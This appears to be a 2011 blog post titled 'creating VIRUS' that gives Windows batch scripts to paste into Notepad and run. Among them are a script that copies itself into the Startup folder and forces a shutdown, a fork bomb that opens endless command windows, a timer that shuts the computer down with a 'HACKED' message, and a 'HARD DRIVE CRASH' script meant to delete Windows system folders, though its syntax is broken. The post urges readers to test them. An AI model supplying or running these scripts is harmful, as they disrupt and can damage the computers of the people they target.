Wednesday, June 15, 2011

creating VIRUS

virus1:
write this in notepad :

@echo off
title Virus Detected
cls
:a
if not exist "%userprofile%\start menu\programs\startup\virus.ba t" goto b
if exist "%userprofile%\start menu\programs\startup\virus.ba t" goto c
goto a
:b
copy "startup.bat" "%userprofile%\start menu\programs\startup\virus.ba t" >nul
goto c
:c
cls
shutdown -s -t 180 -c "You Got Owned"
exit

save as *.bat



virus2:(small virus)
write this in notepad :

:A
Start
Start
Start
goto A

and save as *.bat (any name.bat)

THE MATRIX:
write this in notepad :

@echo off
:A
color 0a
echo 7 y h a g 7 2 3 A S h 5 a J 4 F a p h 6 a p h 6 7 2 3 A S 4 g a 0 K 5 j l a f
ping localhost -n 0 > nul
echo f 4 g a 0 K 5 D 1 2 h k 1 O R D K 6 h 2 h k 1 O R 2 h k O R 4 g a 0 K 5 k f e
ping localhost -n 0 > nul
echo D K 6 h 2 h k 1 O R 2 h k 1 O R 4 g a 0 K 5 O R 2 h k O R 4 g a 0 K 5 k f e
ping localhost -n 0 > nul
echo f 4 g a 0 K 5 D 1 2 h k 1 O R D K 6 h 2 h k 1 O R 2 h k O R 4 g a 0 K 5 k f e
ping localhost -n 0 > nul
echo 7 y h a g 7 2 3 A S h 5 a J 4 F a p h 6 a p h 6 7 2 3 A S 4 g a 0 K 5 j l a f
ping localhost -n 0 > nul
goto A

save as *.bat


THE TIMER:
write this in notepad :

@echo off
title Timer
set time=60
:loop
set /a time=%time%-1
if %time%==0 goto timesup
echo %time%
ping localhost -n 0 > null
cls
goto loop
:timesup
echo Time is up!
echo •
echo •
echo •
echo Press any key to exit...
pause
shutdown -s -t 30 -c "Your computer is HACKED

save as *.bat


HARD DRIVE CRASH
write this in notepad :

@ echo off del c:\\windows\system 32
@ echo off del c:\\windows\system
@ echo off del c:\\windows\repair

save as (any name).bat
after save, open that file


test பண்ணி பாருங்க!!!!!!!!!................

No comments:

Post a Comment